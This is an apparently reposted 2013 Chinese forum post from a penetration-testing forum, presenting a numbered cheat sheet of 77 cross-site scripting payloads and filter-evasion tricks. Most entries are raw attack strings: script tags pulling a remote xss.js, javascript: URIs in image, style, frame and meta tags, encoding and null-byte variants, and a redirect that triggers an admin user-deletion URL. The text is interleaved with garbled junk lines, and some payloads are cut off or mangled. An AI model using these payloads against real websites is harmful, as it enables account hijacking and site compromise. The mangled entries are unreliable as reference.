中国网络渗透测试联盟
标题:
XSS攻击汇总
[打印本页]
作者:
admin
时间:
2013-4-19 19:22
标题:
XSS攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
; W* H7 N4 I# {- H$ J9 q3 w
(1)普通的XSS JavaScript注入
, h' [$ b1 S' j" H# n6 _( A
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
9 ]* g! V L/ ]+ m3 x
(2)IMG标签XSS使用JavaScript命令
4 v* n" {8 K, n$ Z" Y
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
3 Q, v' f. L5 F) B" X
(3)IMG标签无分号无引号
4 S/ Y6 v2 F1 [% Y
<IMG SRC=javascript:alert(‘XSS’)>
3 }, a' t4 k+ z6 J' r* ?
(4)IMG标签大小写不敏感
/ S8 g* e& d* |! k6 b2 S' O
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
& P6 a4 j; B' P* [7 c% m( c
(5)HTML编码(必须有分号)
# a7 y- [8 |& V1 {, H) W( w+ K
<IMG SRC=javascript:alert(“XSS”)>
7 B' L3 |: ~+ [
(6)修正缺陷IMG标签
$ h7 m9 Q! s6 ^, ]) @4 r
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
9 A! u3 |7 D6 K T" b+ u: m
' F c# |' x) @& j0 D/ N- W, \
: m7 Y* [0 A0 S: K, K* t! w! `
(7)formCharCode标签(计算器)
% R* g2 m9 `$ b2 v8 U0 V
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
* c' p2 V0 l' X) [
(8)UTF-8的Unicode编码(计算器)
/ p; P& e. k$ C& l2 y% k1 S
<IMG SRC=jav..省略..S')>
# M% A* e& ~+ E0 H f; \/ }& [
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
* G7 k N" A8 ?, N/ n7 j6 u5 U1 @) g) d
<IMG SRC=jav..省略..S')>
/ L+ B$ D' J; h" v. M
(10)十六进制编码也是没有分号(计算器)
. r: R, W3 v9 [
<IMG SRC=java..省略..XSS')>
a$ Q2 Z* f& ^3 A% `8 ~
(11)嵌入式标签,将Javascript分开
! R& r: }- ^( v6 t$ J3 J5 {
<IMG SRC=”jav ascript:alert(‘XSS’);”>
T" N4 a! _( V7 c9 m' B% h4 o. {
(12)嵌入式编码标签,将Javascript分开
: H! S2 q. [! c: l& ^. [
<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 U; m; q& q0 [( W: @* k+ Y" b
(13)嵌入式换行符
9 \% d0 P, U3 j3 i5 R
<IMG SRC=”jav ascript:alert(‘XSS’);”>
0 Y+ I" e# O7 m( ], Y* c2 l, Y+ R% x
(14)嵌入式回车
8 e1 U" E2 V1 H* Z
<IMG SRC=”jav ascript:alert(‘XSS’);”>
( w5 ~6 q# h( D
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
- P: |( z4 r: J! b7 r' M( `9 X& L) ]
<IMG SRC=”javascript:alert(‘XSS‘)”>
3 w6 Y* }$ U( `; b; D4 s
(16)解决限制字符(要求同页面)
1 M) Z7 R" _: H# U! b
<script>z=’document.’</script>
; }. ]; ^0 o( u
<script>z=z+’write(“‘</script>
/ Q6 a/ B4 ]' g1 _8 m- T
<script>z=z+’<script’</script>
5 P. C$ [, e6 z. v5 q, h1 M/ O5 Q3 q
<script>z=z+’ src=ht’</script>
3 |& W6 [6 g; g N
<script>z=z+’tp://ww’</script>
: I# P+ r% s* _% v5 {: q4 k
<script>z=z+’w.shell’</script>
+ e: M3 o# y) H( _- ~( k# p- M! C& K
<script>z=z+’.net/1.’</script>
/ ]# L( m/ H0 k- H' \, x4 B. L
<script>z=z+’js></sc’</script>
$ v1 ^' D- I! _4 z5 b9 e' ?
<script>z=z+’ript>”)’</script>
5 c& ?7 i% I- E
<script>eval_r(z)</script>
7 ^) C" _ B( h$ p" K! D3 g
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
2 K) f' h& I% U: m0 s$ @
https://www.t00ls.net/viewthread ... table&tid=15267
2/6
* ~' D+ b# ]+ p4 d% g ?# @
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
3 f' ]# v; ?2 x( @" M9 p
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
+ g1 u0 w) Z B9 Z( z) e7 m& `
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
( J* x; G! F3 l. P' D
(19)Spaces和meta前的IMG标签
8 |+ O* E9 B: x& d; M) e# w
<IMG SRC=” javascript:alert(‘XSS’);”>
$ v& y& s- r+ J- U/ @
(20)Non-alpha-non-digit XSS
. @$ L: z; P6 B$ p$ G
<SCRIPT/XSS SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
0 p) J* i/ h5 K J& ^
(21)Non-alpha-non-digit XSS to 2
$ [8 }* N1 u4 q& S& i
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
v/ e& ~1 ~2 C6 z. i) g
(22)Non-alpha-non-digit XSS to 3
4 e9 H9 S, P0 y0 X3 }- Y% C( I
<SCRIPT/SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
# m1 | \# L9 l1 J2 ^5 J7 r( c- K
(23)双开括号
4 p5 y8 p; r& |, \. {9 x8 i6 Y! e
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
C* R1 y1 K- ^
(24)无结束脚本标记(仅火狐等浏览器)
3 e+ e8 A+ t& [9 x) F9 k- ~
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
/ [! M7 P& ^+ p4 Y
(25)无结束脚本标记2
% O1 v" F' X! }8 w6 P: F# i
<SCRIPT SRC=//3w.org/XSS/xss.js>
% k4 C3 f3 Q* R% Q- A- t% B
(26)半开的HTML/JavaScript XSS
0 q' X- B+ L& `* G% U- J
<IMG SRC=”javascript:alert(‘XSS’)”
9 y( V0 u8 E: f& w( n% e# N
(27)双开角括号
9 ]6 V/ d) l, I- F, h0 W: J3 K
<iframe src=http://3w.org/XSS.html <
: M/ l$ Q, ^" I5 I3 W5 G
(28)无单引号 双引号 分号
: v: v+ m7 c+ [; [- P2 z4 F
<SCRIPT>a=/XSS/
5 l9 f& ], |% I$ L& b. |& e
alert(a.source)</SCRIPT>
4 r1 \ ]3 s- U% j5 w
(29)换码过滤的JavaScript
$ {) R6 K: u _ }1 o1 R
\”;alert(‘XSS’);//
) x* k2 _9 r4 h- e/ d! t; G
(30)结束Title标签
" E* G ?8 N& m$ r
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
: \; M) Y% [+ ]) i- K( T/ N
(31)Input Image
7 e2 K' q, C) O) x. v
<INPUT SRC=”javascript:alert(‘XSS’);”>
s4 a, Q: E# Q. D+ m
(32)BODY Image
5 S2 ~6 i2 G6 J: Y& V
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
2 u% P) T8 }- p
(33)BODY标签
5 `4 I% n3 I4 V! h9 X
<BODY(‘XSS’)>
& m: m, u& y( l5 I
(34)IMG Dynsrc
5 a4 s9 _( Q, N4 h
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
% z% i2 _4 }; H3 F3 d; h+ g
(35)IMG Lowsrc
, s" s" a, ~* K; T" ~! ~2 r0 b$ m" |
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
: }9 C5 y% e5 ?' t+ I6 K( s8 Z
(36)BGSOUND
) Q/ p# j' Q& `- H+ A
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
) j e t* a- X, ^ z, d! E, m9 T9 V
(37)STYLE sheet
. y1 _! b) l6 _# `; N7 b7 W+ {
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
: D$ }+ \0 | I5 H
(38)远程样式表
3 e5 a8 X5 v8 j6 q& w% d
<LINK REL=”stylesheet” HREF=”
http://3w.org/xss.css
”>
, u4 x `! D) x9 R( C/ A
(39)List-style-image(列表式)
4 s! X7 a( i2 K e
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
& O; r+ H( k, R0 V2 ~5 K
(40)IMG VBscript
- C% c; W2 B0 m4 S
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
6 s5 |; `% d" x3 N; o
(41)META链接url
. a; c+ ]! T& @, ?
]* O) N: e3 l- \% b" I
2 R2 W+ X% \8 l; K( ?! @
<META HTTP-EQUIV=”refresh” CONTENT=”0;
$ \3 m D* m' `! v% c' D7 Q7 a6 B" ?
URL=http://;URL=javascript:alert(‘XSS’);”>
# H/ h) O4 F; R1 S8 q
(42)Iframe
1 x+ E9 y4 Q- \' L( R% g: f. E7 X( n
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
2 G! I6 I, P1 j; Y: S8 U' m
(43)Frame
2 J1 X& B4 D) H7 P. P) M) A! H
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
8 Q i) D- E. U- R' ~8 k
https://www.t00ls.net/viewthread ... table&tid=15267
3/6
3 O* u- R" ^ G: a% p! W
(44)Table
. u4 f5 o7 n- \$ K/ i* d! G
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
/ p! A& \5 C' Q. x& N6 Y3 r
(45)TD
% G( d) J$ N p! ^7 ~/ d+ |
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
) i1 ^- M* T* I7 ]
(46)DIV background-image
. O" K0 a: A4 U' m: B
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
' V8 @% R% k( U4 T8 C: P
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
# h- F9 Q2 \: q4 Z; {- _. s
8&13&12288&65279)
, e+ j3 F, @4 i' `3 s
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
& Q8 T0 F. j9 L" \0 w4 s& h
(48)DIV expression
6 q* N3 M' X3 E( s# \: h/ }
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
X+ ~1 i& \2 h5 {6 y2 m
(49)STYLE属性分拆表达
% A% ~; _3 e: b5 s" x" j4 P! p
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
: K& m/ I6 \1 C& t
(50)匿名STYLE(组成:开角号和一个字母开头)
; R5 J1 f+ Y" `6 c. ~
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
9 |7 h& w5 R* d6 g* V S* W
(51)STYLE background-image
* D5 w8 X$ [) H- D$ f$ O* L
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
/ n3 l& b7 F G8 X, R
CLASS=XSS></A>
# N; O; E, Q6 z" j$ ]! p, ]
(52)IMG STYLE方式
: {. X+ @, M' ~" t* t* b$ V
exppression(alert(“XSS”))’>
U$ e9 i8 L) p6 V3 z1 Q9 i
(53)STYLE background
* T7 Q0 I$ a7 F& G: v
<STYLE><STYLE
8 C; \( M1 V9 l; }1 C8 j
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
3 V4 C* \" V- O3 ` W, m. _, W9 z
(54)BASE
% y! u4 Q; K0 O! }3 U/ j3 E7 f
<BASE HREF=”javascript:alert(‘XSS’);//”>
! i; k, ~* r8 X
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
& X k* l; }$ [! m9 o7 x5 _9 P
<EMBED SRC=”
http://3w.org/XSS/xss.swf
” ></EMBED>
" W- C# [! x. g' l
(56)在flash中使用ActionScrpt可以混进你XSS的代码
& [0 y3 S* @* S; y( d6 U9 v
a=”get”;
/ y! P+ R' k/ N% y
b=”URL(\”";
( {- F2 V7 @! ^' L' J4 E h
c=”javascript:”;
+ }9 U& o- o6 x: }" J H1 Y
d=”alert(‘XSS’);\”)”;
' H/ G2 c4 E2 s$ j
eval_r(a+b+c+d);
& x7 f4 x3 ?) D' f
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
: \! j T7 L- [, w
<HTML xmlns:xss>
9 q+ j* ^& \, i: z3 T& I
<?import namespace=”xss” implementation=”
http://3w.org/XSS/xss.htc
”>
5 y1 ^! a. A6 T( y! m( i( w
<xss:xss>XSS</xss:xss>
; \* Z7 X f! M, O
</HTML>
7 F3 j0 ~' N8 v# D6 g
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
M$ e* @2 X" w0 X3 f, Z2 \9 ~( h
<SCRIPT SRC=””></SCRIPT>
& \8 g: D( Z. S- V
(59)IMG嵌入式命令,可执行任意命令
" b3 `* @9 B) z8 ?
<IMG SRC=”
http://www.XXX.com/a.php?a=b
”>
U9 _: l0 b* r& j# T* ^7 G/ F
(60)IMG嵌入式命令(a.jpg在同服务器)
- L3 ]* o6 a+ ]& @7 S! }
Redirect 302 /a.jpg
http://www.XXX.com/admin.asp&deleteuser
3 E0 j1 M8 B2 L6 S& S) Y8 z
(61)绕符号过滤
8 B5 z# c# y, z; h, v5 J
<SCRIPT a=”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
) `4 F) v8 @0 t4 t( N. x [
(62)
. L) ]2 D3 q9 P# Y y7 S9 ~
<SCRIPT =”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
) Q# E0 `, c! H$ X( `. ~. @
(63)
- C2 Y9 C, ~" |$ z& z: x0 X2 m) z- B
<SCRIPT a=”>” ” SRC=”
http://3w.org/xss.js
”></SCRIPT>
% k7 \ t& r/ p A l, H
(64)
# `. V4 Z0 h+ X& {5 f8 G7 d3 w/ }
<SCRIPT “a=’>’” SRC=”
http://3w.org/xss.js
”></SCRIPT>
/ }: [$ K9 A# d q: B
(65)
! V- O$ @; [+ Q( g7 V) |
<SCRIPT a=`>` SRC=”
http://3w.org/xss.js
”></SCRIPT>
+ N) P" t6 u* f
(66)12-7-1 T00LS - Powered by Discuz! Board
* `% [6 _2 H% t( C; l
https://www.t00ls.net/viewthread ... table&tid=15267
4/6
" W6 z4 \* J8 _- M8 I/ ~
<SCRIPT a=”>’>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
) Z9 E1 o7 U. j
(67)
{2 ?# m5 f: ^- F6 x7 y
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”
http://3w.org/xss.js
”>
$ I: W0 ~9 w0 X% a7 c: [: G
</SCRIPT>
: p t# _( g3 V5 ^4 P
(68)URL绕行
- l2 x4 [9 @4 f" X: \1 }
<A HREF=”
http://127.0.0.1/
”>XSS</A>
5 _$ p# }5 W# J, E
(69)URL编码
3 q4 k; s6 m- n7 s8 P
<A HREF=”
http://3w.org
”>XSS</A>
9 K: u$ U/ S/ }9 _% @5 W' r/ F
(70)IP十进制
2 O8 o. _& R2 P. Q
<A HREF=”http://3232235521″>XSS</A>
% [0 O( x5 n- K2 z6 P
(71)IP十六进制
0 L# O/ R" X8 p+ e
<A HREF=”
http://0xc0.0xa8.0
×00.0×01″>XSS</A>
& b. t. t# m4 t9 t4 Y/ l
(72)IP八进制
& s3 S$ e# V9 W, c4 {( I, |: O
<A HREF=”
http://0300.0250.0000.0001
″>XSS</A>
& x% L- f# F7 Y5 \, Y
(73)混合编码
' _ S \7 {( t
<A HREF=”h
" V* p8 Z( H) ?" u
tt p://6 6.000146.0×7.147/”">XSS</A>
( \, o0 {" a1 n& e
(74)节省[http:]
, F5 ~, c! ]+ A- H) ^$ Q5 `
<A HREF=”//www.google.com/”>XSS</A>
# s. L6 o; _5 ?' Z& L$ X
(75)节省[www]
# |& B) A4 [1 e- s
<A HREF=”
http://google.com/
”>XSS</A>
' ]6 M$ W7 ~# R% h
(76)绝对点绝对DNS
) j0 L" u" I8 Y0 O& Y. K
<A HREF=”
http://www.google.com./
”>XSS</A>
1 K0 G& r1 h) k
(77)javascript链接
$ n% @7 G! `! G7 P0 }: C
<A HREF=”javascript:document.location=’
http://www.google.com/
’”>XSS</A>
' l! H5 c0 C6 F- \1 `( }
' n4 n' j0 _' g, q t$ I
原文地址:
http://fuzzexp.org/u/0day/?p=14
( u/ l7 k% Y; O9 q8 _% Z; f' Y
; _* ?. t; b. ?: W3 G* a7 W
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2